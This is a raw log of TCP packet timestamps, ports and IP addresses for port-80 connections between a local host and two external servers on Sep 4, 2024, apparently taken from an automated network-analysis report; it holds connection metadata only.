                  Sep 4, 2024 09:37:50.845006943 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.845498085 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.855351925 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:50.860375881 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860380888 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860389948 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860394001 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860398054 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860409021 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860413074 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860421896 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:50.860424995 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763303995 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763482094 CEST8049768176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:51.763525963 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:52.369407892 CEST4976880192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.387459993 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.392509937 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:53.392627001 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.400991917 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:53.405817986 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042309046 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042391062 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:54.042562008 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:54.045105934 CEST4976980192.168.2.4176.57.64.102
                  Sep 4, 2024 09:37:54.049863100 CEST8049769176.57.64.102192.168.2.4
                  Sep 4, 2024 09:37:59.089406013 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.094245911 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.094439983 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.105942965 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.110770941 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808926105 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808948040 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808959961 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808970928 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808983088 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808994055 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.808995962 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809011936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809022903 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809029102 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809037924 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809042931 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809051037 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.809066057 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.809094906 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.813962936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813975096 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813987970 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.813997030 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.814009905 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.814037085 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904623032 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904721022 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904727936 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904742002 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904753923 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904759884 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904766083 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.904779911 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.904808044 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905069113 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905236006 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905246973 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905260086 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905272961 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905275106 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905299902 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905812979 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905824900 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905837059 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905853033 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905878067 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.905898094 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905919075 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905929089 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.905961990 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906753063 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906768084 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906778097 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906794071 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906814098 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906816959 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.906826973 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906838894 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.906869888 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.907711983 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.907752037 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:37:59.909512043 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:37:59.961750984 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000783920 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000797987 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000816107 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000827074 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000844002 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000855923 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000858068 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000866890 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000873089 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000880957 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000891924 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000910044 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000911951 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000922918 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000931025 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000933886 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000943899 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.000951052 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000965118 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000974894 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.000976086 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.001005888 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.001626015 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001638889 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001651049 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001663923 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.001683950 CEST4977080192.168.2.4162.55.254.209
                  Sep 4, 2024 09:38:00.001945019 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001956940 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001966953 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001986027 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.001996994 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.002007961 CEST8049770162.55.254.209192.168.2.4
                  Sep 4, 2024 09:38:00.002011061 CEST4977080192.168.2.4162.55.254.209
Sep 4, 2024 09:38:00.002038002 CEST  49770  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:00.002055883 CEST  49770  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:00.002628088 CEST  80     49770  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:00.002672911 CEST  49770  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:00.618073940 CEST  49770  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:01.637587070 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:01.642390966 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:01.642461061 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:01.652968884 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:01.657757998 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416063070 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416076899 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416088104 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416141033 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.416157007 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416169882 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416179895 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416191101 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416203022 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416213036 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416224003 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416235924 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.416239023 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.416259050 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.416294098 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.421073914 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.421122074 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.421175957 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.483535051 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483549118 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483557940 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483573914 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483647108 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.483812094 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483820915 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483829975 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.483839035 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484380007 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484390974 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484400034 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484409094 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.484446049 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484457016 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.484628916 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.485177994 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485188961 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485197067 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485261917 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.485261917 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.485600948 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485618114 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485627890 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485637903 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485650063 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.485708952 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.485708952 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.488451004 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.488467932 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.488477945 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.488492966 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.488507032 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.488523960 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.488581896 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.581525087 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581589937 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581598997 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581619024 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581629992 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581638098 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581650019 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581665039 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.581729889 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.581861019 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581899881 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581911087 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581963062 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581973076 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581984043 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.581991911 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.582057953 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.582339048 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582384109 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582395077 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582436085 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582448959 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582458019 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.582461119 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582472086 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582482100 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582495928 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.582545042 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.582940102 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582950115 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582958937 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582967043 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.582983971 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.583048105 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:02.583125114 CEST  80     49771  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:02.585464954 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:03.174449921 CEST  49771  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:04.183446884 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:04.188355923 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.195466995 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:04.207552910 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:04.213001966 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213013887 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213023901 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213032961 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213083029 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213093042 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213162899 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213175058 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:04.213182926 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.124836922 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.124869108 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.124877930 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.124922037 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.125013113 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125025034 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125036955 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125052929 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125058889 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.125070095 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.125092983 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125102997 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125112057 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.125129938 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.125148058 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.125497103 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.130013943 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.130031109 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.130058050 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.130376101 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.130417109 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.130492926 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.131114006 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.131125927 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.131150007 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.131902933 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.131920099 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.131936073 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.132746935 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.132785082 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.132807016 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.133564949 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.133601904 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.133625031 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.134532928 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.134569883 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.134664059 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.135255098 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.135267973 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.135294914 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.136184931 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.136226892 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.136301994 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.136940002 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.136980057 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.137351990 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.137428999 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.137475014 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.138287067 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.138415098 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.138454914 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.139035940 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.139168024 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.139204979 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.139874935 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.180506945 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.209969044 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.209980011 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.209995985 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210007906 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210017920 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210026979 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210036993 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210051060 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210058928 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210084915 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210602999 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210645914 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210676908 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210880995 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210892916 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210905075 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210938931 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210962057 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.210964918 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.210973978 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211020947 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.211496115 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211553097 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211564064 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211597919 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.211780071 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211791992 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211811066 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211822033 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211823940 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.211841106 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211852074 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211852074 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.211863995 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.211884022 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.211895943 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.212740898 CEST  80     49772  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:05.212781906 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:05.711869001 CEST  49772  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:06.730432034 CEST  49773  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:06.735249043 CEST  80     49773  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:06.735330105 CEST  49773  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:06.743510962 CEST  49773  80     192.168.2.4      162.55.254.209
Sep 4, 2024 09:38:06.748246908 CEST  80     49773  162.55.254.209   192.168.2.4
Sep 4, 2024 09:38:07.401604891 CEST  80     49773  162.55.254.209   192.168.2.4
